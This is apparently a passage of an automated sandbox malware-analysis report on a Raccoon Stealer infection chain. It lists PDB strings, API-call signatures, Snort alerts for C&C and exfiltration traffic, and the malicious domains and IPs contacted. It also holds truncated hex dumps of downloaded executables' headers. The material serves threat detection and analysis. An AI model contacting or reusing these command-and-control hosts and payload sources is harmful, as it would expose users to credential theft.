                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: C:\sotos20-pacutejisuv\cohehadu24 nunadokosu\web-90\y.pdb source: 6B9B.exe, 6B9B.exe, 00000017.00000000.353267493.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 00000017.00000002.362522821.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 0000001A.00000000.358217888.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: cfgmgr32.pdbm source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: 1C:\wayevuwuku\98\caharesiyopa_p.pdbh source: 77CC.exe, 0000001E.00000000.367538577.0000000000401000.00000020.00020000.sdmp, evjgtzc.exe, 0000002B.00000000.396059268.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\wayevuwuku\98\caharesiyopa_p.pdb source: 77CC.exe, 0000001E.00000000.367538577.0000000000401000.00000020.00020000.sdmp, evjgtzc.exe, 0000002B.00000000.396059268.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\sotos20-pacutejisuv\cohehadu24 nunadokosu\web-90\y.pdbh source: 6B9B.exe, 00000017.00000000.353267493.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 00000017.00000002.362522821.0000000000401000.00000020.00020000.sdmp, 6B9B.exe, 0000001A.00000000.358217888.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbS source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.370105719.0000000005960000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000001B.00000003.362887202.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.363451570.0000000003636000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.362674770.0000000003636000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.370042498.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 5BBC.exe, 00000015.00000000.344013914.0000000000413000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000002.412867900.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.411689423.0000000003750000.00000002.00020000.sdmp
                      Source: Binary string: shlwapi.pdbG source: WerFault.exe, 0000001B.00000003.370132276.0000000005966000.00000004.00000040.sdmp
                      Source: Binary string: C:\tuxifazim\miwoto.pdb source: 6BA5.exe, 0000001C.00000000.361905903.0000000000401000.00000020.00020000.sdmp
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00419C64 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00419E04 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49900 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49929 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49929 -> 185.163.204.24:80
                      Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49900 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.101.24.0 25
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Performs DNS queries to domains with low reputationShow sources
                      Source: DNS query: c9d0e790b353537889bd47a364f5acff43c11f248.xyz
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:14 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:18 GMTContent-Type: application/x-msdos-programContent-Length: 322048Connection: closeLast-Modified: Fri, 14 Jan 2022 18:09:01 GMTETag: "4ea00-5d58eb2938f45"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f1 34 a5 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 ec 03 00 00 ac 11 00 00 00 00 00 e0 b9 01 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 15 00 00 04 00 00 8d 02 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 e7 03 00 50 00 00 00 00 00 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 15 00 fc 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 be ea 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 00 04 00 00 18 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 75 76 00 00 00 00 05 00 00 00 00 d0 14 00 00 02 00 00 00 08 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 65 7a 61 78 00 00 ea 00 00 00 00 e0 14 00 00 02 00 00 00 0a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 65 6c 65 70 61 72 93 0d 00 00 00 f0 14 00 00 0e 00 00 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 00 15 00 00 88 00 00 00 1a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5a 46 00 00 00 90 15 00 00 48 00 00 00 a2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:22 GMTContent-Type: application/x-msdos-programContent-Length: 324608Connection: closeLast-Modified: Fri, 14 Jan 2022 18:09:01 GMTETag: "4f400-5d58eb2941be5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 70 df 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f6 03 00 00 ac 11 00 00 00 00 00 a0 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 69 64 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 f0 03 00 50 00 00 00 00 10 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f4 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7e f4 03 00 00 10 00 00 00 f6 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 65 72 61 76 69 63 05 00 00 00 00 e0 14 00 00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 75 64 65 00 00 00 ea 00 00 00 00 f0 14 00 00 02 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 75 70 00 00 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 10 15 00 00 88 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 46 00 00 00 a0 15 00 00 48 00 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:54 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 18:09:59 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 17:15:09 GMTETag: "6ff1c7-5d58df1eec44d"Accept-Ranges: bytesContent-Length: 7336391Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 51 ae e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 12 0b 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 